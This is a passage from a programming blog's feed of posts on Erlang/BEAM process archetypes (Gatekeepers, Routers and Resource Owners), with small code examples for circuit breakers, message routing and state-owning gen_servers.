backoff, and returns &lt;code&gt;{error, breaker_blocked}&lt;/code&gt; without touching
the target.&lt;/li&gt;
&lt;li&gt;After the backoff period: the first caller past &lt;code&gt;retry_at_ms&lt;/code&gt;
triggers a trial call. If it succeeds, the breaker resets to passing; if it
fails, it stays blocked, increases the backoff, and sets a new
&lt;code&gt;retry_at_ms&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is what you want in front of a flaky PSP or slow third-party service:
protect the rest of the system, limit damage, and probe occasionally for
recovery.&lt;/p&gt;
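&lt;p&gt;Callers see two failure shapes and should treat them differently. A
sketch, assuming the breaker module above is called &lt;code&gt;breaker&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;charge(Breaker, Request) -&amp;gt;
    case breaker:call(Breaker, Request) of
        {ok, Result} -&amp;gt;
            {ok, Result};
        {error, breaker_blocked} -&amp;gt;
            %% Refused without touching downstream: fail fast
            {error, service_unavailable};
        {error, _DownstreamFailure} -&amp;gt;
            %% A real attempt failed (and may have tripped the breaker)
            {error, downstream_error}
    end.
&lt;/code&gt;&lt;/pre&gt;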
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeepers-and-backpressure&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers and Backpressure&lt;/h1&gt;
&lt;p&gt;Backpressure is the polite way of saying:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Slow down. Or no.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Gatekeepers apply backpressure by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;delaying messages&lt;/li&gt;
&lt;li&gt;rejecting messages&lt;/li&gt;
&lt;li&gt;collapsing bursts&lt;/li&gt;
&lt;li&gt;pushing the problem upstream instead of downstream&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Routers do not do this.
Workers do not do this.
Only Gatekeepers regulate flow.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeepers-and-isolation-boundaries&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers and Isolation Boundaries&lt;/h1&gt;
&lt;p&gt;Gatekeepers often sit at &lt;strong&gt;domain boundaries&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;between API → ledger&lt;/li&gt;
&lt;li&gt;between ledger → PSP&lt;/li&gt;
&lt;li&gt;between ingestion → analytics&lt;/li&gt;
&lt;li&gt;between users → sessions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Anywhere unbounded input meets bounded capacity, you need a Gatekeeper.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;a-note-about-latency&quot; tabindex=&quot;-1&quot;&gt;A Note About Latency&lt;/h1&gt;
&lt;p&gt;Gatekeepers introduce latency &lt;strong&gt;on purpose&lt;/strong&gt;.
This is not a bug.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rate limiters smooth spikes&lt;/li&gt;
&lt;li&gt;Flow controllers enforce serialization&lt;/li&gt;
&lt;li&gt;Circuit breakers prevent retries from spiraling&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the BEAM, a few microseconds of routing latency is irrelevant compared to the stability gained.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h1&gt;
&lt;p&gt;Gatekeepers protect the system from excess:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Flow Controllers serialize work&lt;/li&gt;
&lt;li&gt;Rate Limiters regulate volume&lt;/li&gt;
&lt;li&gt;Circuit Breakers isolate failure&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Where Routers shape &lt;em&gt;direction&lt;/em&gt;, Gatekeepers shape &lt;em&gt;timing&lt;/em&gt;.
They are the village’s quiet traffic controllers, ensuring the rest of the gnomes can do their work without panic.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Routers: Processes That Only Decide Where Stuff Goes</title>
    <link href="https://happihacking.com/blog/posts/2025/routers/"/>
    <updated>2025-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/routers/</id>
    <summary>The Gnome Village Mailmen</summary>
    <content type="html">&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/gnome_routers.png&quot; alt=&quot;The Gnome
Village Post Office.&quot; title=&quot;The Gnome
Village Post Office.&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;routers-the-gnome-village-mailmen&quot; tabindex=&quot;-1&quot;&gt;Routers: The Gnome Village Mailmen&lt;/h1&gt;
&lt;p&gt;Routers are the mailmen of the gnome village. They don’t bake bread, run
shops, or manage anything. They stand at the sorting table, look at the
envelope, read the address, and forward the message to the right place.&lt;/p&gt;
&lt;p&gt;That is the entire job description. If a Router starts doing anything other
than sorting and delivering mail, it has stopped being a Router and started
being something else.&lt;/p&gt;
&lt;p&gt;This post defines the Router archetype, shows the common subtypes, and
explains how to keep Routers from drifting into Gatekeeper or Observer
territory.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-is-a-router&quot; tabindex=&quot;-1&quot;&gt;What is a Router?&lt;/h1&gt;
&lt;p&gt;A Router does one thing, in four small steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Receive a message&lt;/li&gt;
&lt;li&gt;(Optionally) inspect it&lt;/li&gt;
&lt;li&gt;Decide where it should go&lt;/li&gt;
&lt;li&gt;Forward it&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Nothing more.&lt;/p&gt;
&lt;p&gt;Preferably with no side effects, no domain logic, no shared state, and no
flow control. Occasional logging or trivial routing logic is fine, but
anything beyond that belongs to another archetype.&lt;/p&gt;
&lt;p&gt;Routers &lt;strong&gt;shape message flow&lt;/strong&gt;. They do not own it, regulate it, or
interpret it. They simply send each message to its destination.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-a-router-is-not&quot; tabindex=&quot;-1&quot;&gt;What a Router Is Not&lt;/h1&gt;
&lt;p&gt;Before we define the subtypes, it’s important to keep the boundaries clean.&lt;/p&gt;
&lt;p&gt;A Router is &lt;strong&gt;not&lt;/strong&gt; a Gatekeeper. It does not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;limit, throttle, or sequence messages&lt;/li&gt;
&lt;li&gt;enforce ordering&lt;/li&gt;
&lt;li&gt;block or regulate flow&lt;/li&gt;
&lt;li&gt;protect a resource&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Router is &lt;strong&gt;not&lt;/strong&gt; an Observer. It does not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;monitor &lt;code&gt;&#39;DOWN&#39;&lt;/code&gt; messages&lt;/li&gt;
&lt;li&gt;restart failing processes&lt;/li&gt;
&lt;li&gt;track health&lt;/li&gt;
&lt;li&gt;enforce invariants&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Router is &lt;strong&gt;not&lt;/strong&gt; a Resource Owner. It does not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;hold domain state&lt;/li&gt;
&lt;li&gt;own a session, connection, or user&lt;/li&gt;
&lt;li&gt;aggregate or accumulate data&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;if-a-process-starts-helping-out-it-is-no-longer-just-a-routerit-is-not-necessarily-always-bad-but-it-makes-it-harder-toreason-about-the-system&quot; tabindex=&quot;-1&quot;&gt;If a process starts “helping out,” it is no longer (just) a Router.
This is not necessarily bad, but it makes the system harder to
reason about.&lt;/h2&gt;
&lt;h1 id=&quot;router-subtypes&quot; tabindex=&quot;-1&quot;&gt;Router Subtypes&lt;/h1&gt;
&lt;p&gt;These are the Router types you actually see in real systems. They fit the
archetype precisely and avoid stepping into Gatekeeper or Observer
responsibilities.&lt;/p&gt;
&lt;h2 id=&quot;1-broadcaster-fan-out&quot; tabindex=&quot;-1&quot;&gt;1. Broadcaster: Fan Out&lt;/h2&gt;
&lt;p&gt;One message comes in. Many messages go out.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info({broadcast, Msg}, State) -&amp;gt;
    [Pid ! Msg || Pid &amp;lt;- State#state.subscribers],
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pub/sub&lt;/li&gt;
&lt;li&gt;cache invalidations&lt;/li&gt;
&lt;li&gt;event fan-out&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No filtering. No rate control. No state beyond the subscriber list. Pure fan-out.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;2-director-route-to-the-right-process&quot; tabindex=&quot;-1&quot;&gt;2. Director: Route to the Right Process&lt;/h2&gt;
&lt;p&gt;The classic Router. Looks at metadata, picks exactly one target.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info({msg, UserId, Data}, State) -&amp;gt;
    Pid = maps:get(UserId, State#state.sessions),
    Pid ! Data,
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;user/session routing&lt;/li&gt;
&lt;li&gt;mapping logical IDs to processes&lt;/li&gt;
&lt;li&gt;request dispatch inside a system&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Directors are the backbone of large BEAM systems.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;3-load-balancer-and-worker-pools&quot; tabindex=&quot;-1&quot;&gt;3. Load Balancer and Worker Pools&lt;/h2&gt;
&lt;p&gt;A &lt;strong&gt;load balancer&lt;/strong&gt; is a Router that picks one worker out of many using a simple, predictable strategy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;round-robin&lt;/li&gt;
&lt;li&gt;hash-based&lt;/li&gt;
&lt;li&gt;random&lt;/li&gt;
&lt;li&gt;“lowest mailbox length”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Routers can keep lightweight routing metadata (like a counter for
round-robin), but nothing domain-specific or persistent. The job is
routing, not state.&lt;/p&gt;
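&lt;p&gt;A minimal round-robin sketch (assuming the Router keeps its worker list
in a &lt;code&gt;workers&lt;/code&gt; field; the rotated list is the only metadata):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info({job, Job}, #state{workers = [W | Rest]} = State) -&amp;gt;
    %% Send to the head of the list, then rotate it to the back.
    W ! {job, Job},
    {noreply, State#state{workers = Rest ++ [W]}}.
&lt;/code&gt;&lt;/pre&gt;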
&lt;p&gt;This is exactly what the process in front of a worker pool does. The pool
manager in poolboy and similar libraries is a &lt;strong&gt;Router&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it receives a job&lt;/li&gt;
&lt;li&gt;picks a worker&lt;/li&gt;
&lt;li&gt;forwards the job&lt;/li&gt;
&lt;li&gt;and stops there&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The workers behind the pool may also act as &lt;strong&gt;Resource Owners&lt;/strong&gt; if they
hold long-lived resources (like a DB connection), but that does not change
the Router’s role. It is still just forwarding messages.&lt;/p&gt;
&lt;p&gt;The key property remains: the Router does &lt;strong&gt;not&lt;/strong&gt; apply backpressure or
enforce limits. If it starts doing that, it is no longer (just) a Router,
it has become a Gatekeeper.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;4-demultiplexer-message-splitter&quot; tabindex=&quot;-1&quot;&gt;4. Demultiplexer (Message Splitter)&lt;/h2&gt;
&lt;p&gt;Split one inbound stream into several logical channels based on message
shape.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;case Event of
    {audit, D}      -&amp;gt; AuditPid ! D;
    {analytics, D}  -&amp;gt; AnalyticsPid ! D;
    {telemetry, D}  -&amp;gt; TelemetryPid ! D
end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;separating analytics from real-time paths&lt;/li&gt;
&lt;li&gt;multi-purpose message streams&lt;/li&gt;
&lt;li&gt;protocol front-ends&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Demuxing is classification only.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;5-multiplexer-message-merger&quot; tabindex=&quot;-1&quot;&gt;5. Multiplexer (Message Merger)&lt;/h2&gt;
&lt;p&gt;A Multiplexer is the reverse of a Demultiplexer: many inbound streams, one
unified forward path. It simply forwards messages from several sources into
a single output channel.&lt;/p&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;bridging legacy single-threaded systems&lt;/li&gt;
&lt;li&gt;merging updates from several producers&lt;/li&gt;
&lt;li&gt;simplifying downstream processing&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pure multiplexing is &lt;strong&gt;still just forwarding&lt;/strong&gt;.
No buffering. No priority. No state.&lt;/p&gt;
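&lt;p&gt;A sketch of pure multiplexing (assuming a single &lt;code&gt;downstream&lt;/code&gt;
pid in the Router&#39;s state):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info({From, Msg}, State) -&amp;gt;
    %% Tag with the source and forward. No buffering, no ordering.
    State#state.downstream ! {From, Msg},
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;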
&lt;hr /&gt;
&lt;h3 id=&quot;when-multiplexers-drift-into-state&quot; tabindex=&quot;-1&quot;&gt;When Multiplexers Drift Into State&lt;/h3&gt;
&lt;p&gt;Sometimes you want more than merging.
For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;you need &lt;strong&gt;ordering across streams&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;or you need to &lt;strong&gt;batch or aggregate&lt;/strong&gt; messages before sending them
downstream&lt;/li&gt;
&lt;li&gt;or you need to &lt;strong&gt;emit one combined payload&lt;/strong&gt; (e.g. a JSON array or binary
packet)&lt;/li&gt;
&lt;li&gt;or you need to &lt;strong&gt;coordinate replies&lt;/strong&gt; from multiple workers before acting&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The moment you introduce:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;buffering&lt;/li&gt;
&lt;li&gt;collecting&lt;/li&gt;
&lt;li&gt;waiting for multiple sources&lt;/li&gt;
&lt;li&gt;sequencing&lt;/li&gt;
&lt;li&gt;assembling a single final result&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;…you are no longer implementing a Router.&lt;/p&gt;
&lt;p&gt;You have quietly moved into &lt;strong&gt;Resource Owner&lt;/strong&gt; (state + transformation) or
&lt;strong&gt;Gatekeeper&lt;/strong&gt; territory (sequencing, synchronization).&lt;/p&gt;
&lt;p&gt;That isn’t wrong, but it is a different archetype.&lt;/p&gt;
&lt;p&gt;A Router does not shape &lt;em&gt;when&lt;/em&gt; messages flow or &lt;em&gt;how many&lt;/em&gt; messages become
one. It only shapes &lt;em&gt;where&lt;/em&gt; messages flow.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;6-protocol-router&quot; tabindex=&quot;-1&quot;&gt;6. Protocol Router&lt;/h2&gt;
&lt;p&gt;Routes based on protocol, after the smallest possible decoding step.&lt;/p&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;TCP front-ends handling several protocols&lt;/li&gt;
&lt;li&gt;gateways&lt;/li&gt;
&lt;li&gt;hybrid endpoints (WebSocket + HTTP + JSON-RPC)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Protocol Router chooses handlers based on &lt;em&gt;shape&lt;/em&gt;, not behaviour.
If it enforces rules or validates messages, it becomes a Gatekeeper.&lt;/p&gt;
&lt;p&gt;Here is a minimal, slightly contrived example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% protocol_router.erl

handle_info({tcp, Sock, Bin}, State) -&amp;gt;
    case decode(Bin) of
        {http, ReqBin} -&amp;gt;
            State#state.http_handler ! {Sock, ReqBin};

        {jsonrpc, JsonBin} -&amp;gt;
            State#state.jsonrpc_handler ! {Sock, JsonBin};

        {websocket, FrameBin} -&amp;gt;
            State#state.ws_handler ! {Sock, FrameBin};

        _Other -&amp;gt;
            %% Unknown protocol: hand off to a generic handler
            State#state.fallback_handler ! {Sock, Bin}
    end,
    inet:setopts(Sock, [{active, once}]),
    {noreply, State}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;decode/1&lt;/code&gt; function does only the bare minimum required to classify the message:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;decode(&amp;lt;&amp;lt; &amp;quot;{&amp;quot;, _/binary &amp;gt;&amp;gt; = Bin) -&amp;gt;
    {jsonrpc, Bin};

decode(&amp;lt;&amp;lt;&amp;quot;GET &amp;quot;, _/binary&amp;gt;&amp;gt; = Bin) -&amp;gt;
    {http, Bin};

decode(&amp;lt;&amp;lt;16#81, _/binary&amp;gt;&amp;gt; = Bin) -&amp;gt;
    {websocket, Bin};

decode(Bin) -&amp;gt;
    {unknown, Bin}.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id=&quot;key-points&quot; tabindex=&quot;-1&quot;&gt;Key points&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;The Router reads bytes from the socket.&lt;/li&gt;
&lt;li&gt;Performs a &lt;strong&gt;minimal test&lt;/strong&gt; to classify the protocol, not a full parse.&lt;/li&gt;
&lt;li&gt;Forwards the original payload to the appropriate handler.&lt;/li&gt;
&lt;li&gt;Does not enforce sequencing, limits, authentication, or retries.&lt;/li&gt;
&lt;li&gt;Keeps no state beyond handler PIDs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;a-note-of-caution&quot; tabindex=&quot;-1&quot;&gt;A note of caution&lt;/h3&gt;
&lt;p&gt;In a real system, you probably &lt;strong&gt;do not want to parse the payload inside
the Router&lt;/strong&gt;. Parsing large JSON or WebSocket frames in the Router turns it
into a bottleneck, or a denial-of-service surface. A flood of oversized
JSON messages can stall the Router, preventing it from classifying the next
packet.&lt;/p&gt;
&lt;p&gt;As Richard Carlsson pointed out in a review of this post:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A Protocol Router should avoid parsing payloads.
It should classify quickly and forward immediately.
Let the handler process deal with parsing and errors.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;7-shard-router&quot; tabindex=&quot;-1&quot;&gt;7. Shard Router&lt;/h2&gt;
&lt;p&gt;A Shard Router is a specialized Director that routes predictably by
hashing a key.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% phash2/2 returns 0..NumShards-1; lists:nth/2 is 1-based.
Shard = erlang:phash2(Key, NumShards),
lists:nth(Shard + 1, ShardPids) ! Msg.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Used for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;per-user or per-account isolation&lt;/li&gt;
&lt;li&gt;scalable ledger domains&lt;/li&gt;
&lt;li&gt;consistent partitioning&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Shard Routers create &lt;strong&gt;isolation boundaries&lt;/strong&gt;, not ordering guarantees.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h1&gt;
&lt;p&gt;Routers keep the village moving. They don’t decide &lt;em&gt;when&lt;/em&gt; messages should
flow, or &lt;em&gt;how fast&lt;/em&gt;, or &lt;em&gt;what happens if something goes wrong&lt;/em&gt;. They only
decide &lt;strong&gt;where&lt;/strong&gt; messages go.&lt;/p&gt;
&lt;p&gt;Keeping Routers simple makes debugging obvious and system behaviour
predictable. If you give a Router too much responsibility, it stops being a
Router.&lt;/p&gt;
&lt;p&gt;Next up: &lt;strong&gt;Gatekeepers&lt;/strong&gt;, the archetype that actually cares about flow,
limits, and containment. They do the work Routers deliberately refuse to
do.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Resource Owners: One Process, One Piece of State</title>
    <link href="https://happihacking.com/blog/posts/2025/resource_owners/"/>
    <updated>2025-11-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/resource_owners/</id>
    <summary>The boring, reliable center of most good systems</summary>
    <content type="html">&lt;h2 id=&quot;the-gnome-who-guards-the-chest-of-gold&quot; tabindex=&quot;-1&quot;&gt;The Gnome Who Guards the Chest of Gold&lt;/h2&gt;
&lt;p&gt;In the gnome village, not every gnome runs around performing tasks. Some
stay in one place, holding on to something important. A chest of gold. A
ledger. A cart. A user session. They don&#39;t roam, they don&#39;t multitask, and
they are not easily distracted. They are predictable by design.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/gnome_owner.png&quot; alt=&quot;A happy gnome
holding the key to the treasure chest.&quot; title=&quot;A Gnome with a key.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Everything that touches that piece of state goes through this gnome. No
exceptions. No secret shortcuts. No shared cupboards where anyone can slip
in and &amp;quot;just update one field&amp;quot;.&lt;/p&gt;
&lt;p&gt;The Resource Owner archetype is simple: one process owns one thing.&lt;/p&gt;
&lt;p&gt;Everyone else sends requests. The Resource Owner decides what happens. It
enforces the rules, updates the state, and ensures that invariants stay
invariant. If two other gnomes want to withdraw from the same chest of gold
at the same time, this gnome decides the order. There are no races, only
queues.&lt;/p&gt;
&lt;p&gt;A Resource Owner doesn&#39;t need locks, because no one else is allowed to
touch the chest. It doesn&#39;t need coordination protocols, because the
mailbox does the serialization.&lt;/p&gt;
&lt;p&gt;You can send as many messages as you want. The Resource Owner handles them
one at a time. It is boring, reliable, and honest work. In other words: the
foundation of most good systems.&lt;/p&gt;
&lt;p&gt;Workers run around doing tasks. Resource Owners sit still and make sure
those tasks don&#39;t break anything.&lt;/p&gt;
&lt;p&gt;If you&#39;ve ever wondered why BEAM systems behave sensibly under concurrency
pressure, this is the reason. There is always a gnome with the key to the
chest, and everyone in the village respects that arrangement.&lt;/p&gt;
&lt;h2 id=&quot;what-exactly-is-a-resource-owner&quot; tabindex=&quot;-1&quot;&gt;What Exactly Is a Resource Owner?&lt;/h2&gt;
&lt;p&gt;A Resource Owner is the simplest idea that people consistently
overcomplicate.&lt;/p&gt;
&lt;p&gt;It is a process whose entire job is to own one piece of state.
All interaction with that state happens through the process.&lt;/p&gt;
&lt;p&gt;Because the Resource Owner has a mailbox, it automatically serializes
access. Two concurrent updates become a queue, not a race. The process
handles one message at a time, in order, and applies the change cleanly.&lt;/p&gt;
&lt;p&gt;OTP encourages you to write these as a &lt;code&gt;gen_server&lt;/code&gt;. For very simple owners
you don&#39;t have to. A simple receive loop works just as well. The behaviour
module is convenience, not magic.&lt;/p&gt;
&lt;p&gt;For anything more complex, a &lt;code&gt;gen_server&lt;/code&gt; gives you a lot for free: code
upgrades, casts and calls, and a familiar interface.&lt;/p&gt;
&lt;p&gt;A Resource Owner is not a Worker. Workers do things: calculations, I/O,
external calls. Resource Owners protect things: the chest of gold, the
cart, the payment intent, the ledger entry.&lt;/p&gt;
&lt;p&gt;If a Worker needs to modify a resource, it does not touch the state itself.
It sends a message to the Resource Owner. The Worker may be short-lived.
The Resource Owner is the stable part of the system.&lt;/p&gt;
&lt;h2 id=&quot;a-minimal-example&quot; tabindex=&quot;-1&quot;&gt;A Minimal Example&lt;/h2&gt;
&lt;p&gt;Here is the smallest useful Resource Owner: a process that owns a counter.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(counter_owner).
-export([start_link/0, increment/1, value/1]).

start_link() -&amp;gt;
    spawn_link(fun() -&amp;gt; loop(0) end).

increment(Counter) -&amp;gt;
    Counter ! {self(), increment},
    receive
        {Counter, Reply} -&amp;gt; Reply
    end.

value(Counter) -&amp;gt;
    Counter ! {self(), get},
    receive
        {Counter, V} -&amp;gt; V
    end.

loop(State) -&amp;gt;
    receive
        {From, increment} -&amp;gt;
            New = State + 1,
            From ! {self(), ok},
            loop(New);

        {From, get} -&amp;gt;
            From ! {self(), State},
            loop(State)
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This tiny process gives you:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One owner of one integer.&lt;/li&gt;
&lt;li&gt;Serialized access without locks.&lt;/li&gt;
&lt;li&gt;Predictable updates.&lt;/li&gt;
&lt;li&gt;No race conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ten, a hundred, or a thousand increments can arrive concurrently. They all
go through the same process. The mailbox turns concurrency into a queue.&lt;/p&gt;
&lt;p&gt;This is the smallest form of a Resource Owner. The larger forms follow the
same principle, just with more interesting state.&lt;/p&gt;
&lt;p&gt;Resource Owners come in two flavours. The first group are Entity Owners.
The second are Aggregators.&lt;/p&gt;
&lt;h2 id=&quot;entity-owners&quot; tabindex=&quot;-1&quot;&gt;Entity Owners&lt;/h2&gt;
&lt;p&gt;Entity Owners represent logical domain state. They are the small, polite
gnomes guarding individual pieces of your system&#39;s model:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a socket or DB connection&lt;/li&gt;
&lt;li&gt;a shopping cart or user session&lt;/li&gt;
&lt;li&gt;an order or payment intent&lt;/li&gt;
&lt;li&gt;a chat room or game entity&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you can point at it in your domain and say &amp;quot;this thing has identity and
state,&amp;quot; it can probably be represented as an Entity Owner.&lt;/p&gt;
&lt;p&gt;These processes are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Long-lived and tied to an ID&lt;/li&gt;
&lt;li&gt;Started when needed, shut down when finished&lt;/li&gt;
&lt;li&gt;The single authority on the rules of that entity (for example, &amp;quot;a balance
must not go negative&amp;quot;)&lt;/li&gt;
&lt;li&gt;A natural fit for the BEAM, because the mailbox gives you serialization
without locks, and the process gives you isolation without drama&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;a-shopping-cart-owner&quot; tabindex=&quot;-1&quot;&gt;A Shopping Cart Owner&lt;/h3&gt;
&lt;p&gt;Here is a simple cart owner. It holds items, enforces quantity rules, and
exposes the current state on request. The API uses the cart ID directly,
so callers don&#39;t need to track PIDs. One process per cart ID. If you know
the ID, you know the owner.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(cart_owner).
-behaviour(gen_server).

-record(state, {id, items = #{}}).

-export([start_link/1, add_item/3, get_items/1]).
-export([init/1, handle_call/3, handle_cast/2]).

start_link(CartId) -&amp;gt;
    gen_server:start_link({global, {cart, CartId}},
                          ?MODULE, CartId, []).

add_item(CartId, ItemId, Qty) when Qty &amp;gt; 0 -&amp;gt;
    gen_server:call({global, {cart, CartId}}, {add, ItemId, Qty}).

get_items(CartId) -&amp;gt;
    gen_server:call({global, {cart, CartId}}, get_items).

init(CartId) -&amp;gt;
    {ok, #state{id = CartId}}.

handle_call({add, ItemId, Qty}, _From,
            #state{items = Items} = St) -&amp;gt;
    Current = maps:get(ItemId, Items, 0),
    NewItems = Items#{ItemId =&amp;gt; Current + Qty},
    {reply, ok, St#state{items = NewItems}};

handle_call(get_items, _From,
            #state{items = Items} = St) -&amp;gt;
    {reply, Items, St}.

handle_cast(_Msg, St) -&amp;gt;
    {noreply, St}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that &lt;code&gt;{local, Name}&lt;/code&gt; requires an atom, so a composite name
like &lt;code&gt;{cart, CartId}&lt;/code&gt; needs &lt;code&gt;global&lt;/code&gt; registration. In
real systems you would probably use a process registry (gproc, pg, or a via
callback) instead of &lt;code&gt;{global, ...}&lt;/code&gt;, but this is enough to show
the idea.&lt;/p&gt;
&lt;p&gt;Two concurrent &amp;quot;add item&amp;quot; requests arrive for the same cart. The mailbox
queues them. The first completes, updates the map, and replies. The second
sees the updated state and proceeds. No locks, no retries. Just order.&lt;/p&gt;
&lt;p&gt;This is why Entity Owners feel like cheating when you first encounter them.
You stop writing defensive code and start writing real logic.&lt;/p&gt;
&lt;h3 id=&quot;lifecycle&quot; tabindex=&quot;-1&quot;&gt;Lifecycle&lt;/h3&gt;
&lt;p&gt;Entity Owners are not global daemons. They exist only when needed.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When the first request comes in, a supervisor starts the process.&lt;/li&gt;
&lt;li&gt;When the entity is complete, idle, or expired, it shuts down.&lt;/li&gt;
&lt;li&gt;If the process crashes, supervision restarts it, either fresh or from
persisted state.&lt;/li&gt;
&lt;li&gt;Because its state is isolated, a crash only affects that one entity.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the kind of failure you want in production: local, predictable, and
obvious.&lt;/p&gt;
&lt;h3 id=&quot;pitfalls&quot; tabindex=&quot;-1&quot;&gt;Pitfalls&lt;/h3&gt;
&lt;p&gt;Entity Owners are simple. People make them complicated. Here are the usual
ways:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The God Entity.&lt;/strong&gt; One process ends up owning far too much: user profile,
cart, settings, metrics, half the application. This becomes a serialization
bottleneck. Also: painful to debug.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A backpack full of boulders.&lt;/strong&gt; The process holds megabytes of state:
giant maps, binary blobs, or entire chat histories. Result: GC pauses, high
memory usage, and slow everything. Move big state to ETS or external
storage.&lt;/p&gt;
